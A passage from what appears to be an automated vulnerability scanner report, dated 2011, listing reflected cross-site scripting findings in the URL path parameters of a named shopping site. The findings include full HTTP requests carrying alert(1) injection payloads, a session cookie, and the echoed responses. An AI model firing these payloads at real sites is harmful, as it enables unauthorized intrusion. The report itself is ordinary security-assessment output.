Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories10209<script>alert(1)</script>85b58cd2fad <a href="#" id="backlink">
...[SNIP]...

4.805. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9918d'-alert(1)-'0cfdfdbe39d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories9918d'-alert(1)-'0cfdfdbe39d/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:06:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessories9918d'-alert(1)-'0cfdfdbe39d/194367784/Fragrance/39';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.806. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20a49'-alert(1)-'b4e23825a91 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/19436778420a49'-alert(1)-'b4e23825a91/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:14:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/19436778420a49'-alert(1)-'b4e23825a91/Fragrance/39';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.807. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a759e'-alert(1)-'9b9436bf688 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Fragrancea759e'-alert(1)-'9b9436bf688/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:20:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Fragrancea759e'-alert(1)-'9b9436bf688/39';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.808. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59ca'-alert(1)-'b95c66db0c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Fragrance/39d59ca'-alert(1)-'b95c66db0c2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Fragrance/39d59ca'-alert(1)-'b95c66db0c2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.809. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c871'-alert(1)-'d5d73661ea1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping5c871'-alert(1)-'d5d73661ea1/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:54:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping5c871'-alert(1)-'d5d73661ea1/Clothing-Accessories/194367784/Glasses-Eye-Wear/38';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.810. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfae5"><a>d4387b467f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingdfae5"><a>d4387b467f6/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:39:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingdfae5"><a>d4387b467f6">
...[SNIP]...

4.811. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b46c3<script>alert(1)</script>3a630b354c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessoriesb46c3<script>alert(1)</script>3a630b354c8/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:00:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessoriesb46c3<script>alert(1)</script>3a630b354c8 <a href="#" id="backlink">
...[SNIP]...

4.812. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a527'-alert(1)-'342e392d1d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories8a527'-alert(1)-'342e392d1d1/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:59:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories8a527'-alert(1)-'342e392d1d1/194367784/Glasses-Eye-Wear/38';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.813. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4814e'-alert(1)-'279d2584fa2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/1943677844814e'-alert(1)-'279d2584fa2/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:08:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/1943677844814e'-alert(1)-'279d2584fa2/Glasses-Eye-Wear/38';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.814. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4693c'-alert(1)-'a88536994b6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear4693c'-alert(1)-'a88536994b6/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:13:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear4693c'-alert(1)-'a88536994b6/38';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.815. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51800'-alert(1)-'b0159144be0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/3851800'-alert(1)-'b0159144be0 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:18:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/3851800'-alert(1)-'b0159144be0';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.816. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2114"><a>e3500dc4ea8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppinge2114"><a>e3500dc4ea8/Clothing-Accessories/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:53:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppinge2114"><a>e3500dc4ea8">
...[SNIP]...

4.817. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e97f'-alert(1)-'9e3197d8b3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping8e97f'-alert(1)-'9e3197d8b3e/Clothing-Accessories/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:10:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
